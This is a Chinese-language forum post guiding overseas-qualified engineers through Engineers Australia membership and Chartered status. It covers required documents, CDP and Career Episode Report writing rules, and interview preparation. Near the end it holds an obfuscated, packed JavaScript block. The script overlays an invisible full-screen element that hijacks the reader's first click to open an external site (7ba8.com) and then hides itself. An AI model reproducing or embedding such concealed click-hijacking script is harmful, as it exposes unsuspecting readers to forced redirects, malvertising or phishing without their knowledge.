申请 EA Chartered Status Engineer 全攻略

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应群内成员强烈要求,现本人将申请澳洲Chartered Status Engineer的详细过程及报告编写技巧汇总,希望各位工程师也能顺利通过评估获得Chartered。
接下来,我要详细说明申请chartered的条件,这个官方网站上也有http://www.engineersaustralia.or ... red-status_home.cfm
这里必须要说明的是,在有权利申请chartered之前,你必须是Engineers Australia协会的会员(membership)。
我是在中国上的大学,没有澳洲教育背景,工程师协会的负责人告诉我应该如何做,下面是信的所有内容:如果是在英国或其他国家读的大学,请上官方网站上找寻相关accredited 的信息,由于我的学历背景不是这个,所以没有经验,还请自行研究,如有问题,建议大家跟各个省市的工程师协会的人联系,他们会给你们更多帮助。
其他的申请方法请参阅http://www.engineersaustralia.or ... FFABA41#applystage1

“Engineers, such as you, with overseas qualifications that are not accredited under the Washington Accord will firstly need to have their academic qualifications formally assessed by Engineers Australia. We call this the Stage 1 Assessment.  
This formal assessment will determine the equivalence of their overseas engineering qualifications to Australian academic qualifications and their eligibility for Chartered Membership in either of the three occupational categories, namely, Chartered Professional Engineer (CPEng), Chartered Engineering Technologist (CEngT) and Chartered Engineering Officer (CEng).   
Details of the process and the assessment are documented in the Guide to Eligibility for Membership. This Guide can be found on our web site at   www.engineersaustralia.org.au  under "Join Engineers Australia" -> "Stage 1 Competency Assessment".
Once overseas qualified Engineers receive the outcome of this assessment, they will be invited to become members of Engineers Australia in the appropriate occupational category. A form detailing the information to be provided with this application for admission to membership is also available on the web site.
Finally once they have become a member of Engineers Australia the “Chartered Status Handbook” will provide the guidance for them in gaining Chartered Status in the appropriate occupational category. In this they will need to demonstrate the level of competency of an experienced engineering practitioner. This Handbook is also available on our web site under “Get Chartered Status”. We call this the Stage 2 Assessment.
The requirements for Registration may be found on the National Engineering Registration Board's website www.nerb.org.au which can be accessed from our website under "Registration and Assessment". In short Registration is available to engineers who have demonstrated their eligibility for Chartered membership of Engineers Australia under the process outlined in the preceding paragraph. At that point you may decide to become registered without also taking up the offer of Chartered membership. However most applicants elect to be both Chartered Members and registered.“
(一)        Membership 申请阶段(针对持有中国学历的同胞,其他说明请参见The Guide to Assessment of Eligibility for Membership (Stage 1 Competency))
The assessment process is outlined in the attached documents, however in broad terms applicants are required to submit the following documentation for review:
a) Documentation of their qualification/s including the degree or diploma testamur/s or certificate/s, and academic transcript/s listing the courses, subjects or units studied and the results you gained in each. 找个工程师协会的成员作verify。
b) A Curriculum Vitae including an outline of any engineering employment history. This may include employment or engineering experience undertaken before, during and since formal qualification/s. 找个工程师协会的成员作verify。
c) Three narratives describing major learning experiences through which they personally developed and demonstrated Stage 1 competency, as set out in the relevant Appendix B (attached). These narratives may relate to the educational program, and/or experience gained in engineering employment.
d) A summary table, relating each Element of competency to one or more paragraphs in the narratives.
e) Evidence of English-language competency, if applicable. 雅思成绩或澳洲公司出具的英语证明 ,本人是请公司开具的英语证明(已经达到business level,人事部门开具的)
f) A signed declaration that the application is their own work and that the information it contains is true and correct. 申请表格,http://www.engineersaustralia.or ... FFABA41#applystage1 寻找申请表格,下载,签字即可。
g)Continued developing program:大家就将在国内的经验写进去就好了。在membership阶段,是不需要verify的。这个在membership阶段不是很重要,但提请大家,在这个阶段写完的CDP一定要与在接下来申请charter的CDP时间上保持一致。尽管在不同阶段,是不同的人评估你的材料。也要保证材料的真实性!!!!
http://www.engineersaustralia.or ... red-status_home.cfm

记忆比较模糊,似乎只有工作经验超过5年还是6年的工程师才有资格申请Chartered。而在这5或6年内,你要写N(由个人自行决定)篇narratives 去描述你所工作的内容,写完一篇,然后找个了解你工作的supervisor verify你的工作经历。这是个循环过程,直到你写的报告满足所有的competences。这个competences在Chartered Status Handbook 里。3+2, 3个必须写的部分,还有2个自己选择的部分。详细的内容请研究handbook。
(二)        Chartered Status Engineer 申请阶段
需要准备的资料,我就不在这里详细说明了,因为协会也会更新“要求清单”的,所以最好自己在网上下载最新的handbook。但要求写narratives,是一样的。大家都要根据要求写自己的报告。协会提供一次免费draft评估一篇报告。这是draft的,不是最终的,在assessed报告里,他们会告诉你你的narrative里面的问题。但通常情况下,他们很“狠狠”的指出你报告的问题,不用担心,他们在正式审核的时候,不会那么苛刻~~~  里面的原因用小脑都能想到了~~~
The general requirements to be met include
1) Each Career Episode Report (CER) should be titled, dated and commence with a paragraph
which describes the project or program covered by the CER and defines your specific role and
responsibilities, along with relationships with key project stakeholders.
2) You need to write consistently throughout the document in the first person singular ( the "I" ) to
describe your personal roles, responsibilities and activities. Where you have been involved in a
joint or team activity, you need to be quite specific in describing your personal part or contribution
to the overall activity.
3) When claiming a particular Competency Element you need to ensure that the adjacent write-up
demonstrates that you have undertaken the activities defined by the Defining Activities, as set out
in the Chartered Status Handbook, for that Element. You need to address all or most of the
Defining Activities in order to claim an Element. The more Activities you can demonstrate the
stronger will be your submission. ( Note : do not claim the Defining Activities individually, rather
make sure you have written comprehensively about them in the paragraph against which you
claim a particular Element. )
4) You need to present evidence of your competencies. Therefore the write-up needs to describe
not just what you did. It needs to be more analytical showing "how" you went about demonstrating
the Element, including the engineering thought processes, judgements, skills and/or tools you
applied to the activity. The Defining Activities give guidance in this area. As a general rule of
thumb, it would normally take a good size paragraph (200-300 words) to sufficiently demonstrate
the Defining Activities for each Element.
5) Your narrative should make reference to specific examples throughout to illustrate your claimed
roles and activities, and should not rely on personal opinions, general statements or assertions.
You should avoid the use of phrases such as "I was responsible for.." or "I ensured that.." and
instead use direct action statements describing your specific personal engineering activity.
6) It is generally acceptable to accumulate claims for the Elements of a Unit from several CERs.
However the exceptions are Elective Units E4A, E4B, E5, E6, E7 and E8 in which the Elements
are a continuum. In these cases complete Units are normally required to be presented from single
projects. For Units E1A and E1B, evidence may be drawn from more than one project, but should
be presented in a single CER.
7) Prior to submission, you should do a reality check for each Element claimed to ensure that the Defining Activities have been sufficiently demonstrated in the adjacent text. This may require
some further detail to be added if this is valid.
8) The final step is to print a finalised hardcopy of each CER from e-PDP, sign at the end of the
last page and arrange for verification by a senior experienced engineer who can attest that he/she
is familiar with the work you have described and the contributions you have made.
9) The original signed hard copy of the CER, together with the completed standard CER
Coversheet (also printed from e-PDP at the same time you print your final version of the CER) can
then be posted to me at Engineers Australia, Level 11, 108 King William Street, Adelaide SA 5000
for my formal endorsement. This original is then returned to you for your retention and inclusion in
your final Engineering Practice Report (EPR) once you have written up all the required
Competency Elements.
10) After my endorsement of your first CER you will understand the requirements for competent
evidence of your practice competencies and be in a position to skip the draft review step and
proceed directly to submit further verified CERs for my formal endorsement, until you have
completed demonstration of all the required competencies.
这个本人拖拖拉拉用了4个月完成,这中间的过程是,改了又改。因为我已经有足够的经验就是写报告而已,写完报告还请mentor review。这个时间比较长。用了3个月(其中圣诞节,大家都休息,他们喜欢休长假呀~~~~ 注重个人生活!)
1.        首先,详细研究所有的units of competences ,做到理解的程度,不要只读,因为有些东西你会误解。这个就是中介赚钱的地方(不过倒是个挣钱的方法~~~)。
2.        根据工作经验,为每个narrative,建立中文结构框架(考虑逻辑思维问题,中文框架有助于我思考)。
例如,我写如何泵站设计,在这个设计中,能cover哪些units of competences? 然后根据详细的competences,在你的设计过程中,哪些具体的事情能说明这些competences。对好入座。在这里建议中中文写。因为到后面你可能会发现同一个例子可能cover很多不同units。为避免重复,看中文比较方便~~~
3.        根据框架,往里面填中文“肉”。我计算给水管网,这个能说明我的知识应用能力,还有根据规范,标准设计的,那么你就符合codes。详细的说明你做过什么,你怎么做的。
4.        检查逻辑思维框架,对照elements/competence进行反复修改,最终完成整理结构。最重要的一环,如果成功建立框架,下面就只剩下翻译工作了。
5.        翻译英文,组织句子,承上启下。这个就靠你的英文功底了,不是逻辑的问题了。
6.        请mentor review你的报告,都没问题了,最后请supervisor签字。如果你的supervisor在中国,给他们发个电子版的,然后让他们打印出来,签字再给你寄到澳洲来。这个签字必须是亲笔签字,不能代签(诚实是code的一部分)!
准备powerpoint,随时通过图示讲解设计内容,或工作内容,以便说明的组织,技术,管理等能力。 仔细听问话, 听说能力要有~~~ 否则,干脆就别去面试,免得有被拒记录就不好了。
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<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>我计划组织一个南澳的中国的工程师协会,主要是利用从政府那得到相应的计划,来帮助澳洲的新移民类工程师找到工作。欢迎大家入南澳工程师联盟,群号126438561
2.工程师类专业:IT, 市政,建筑, 地质~~
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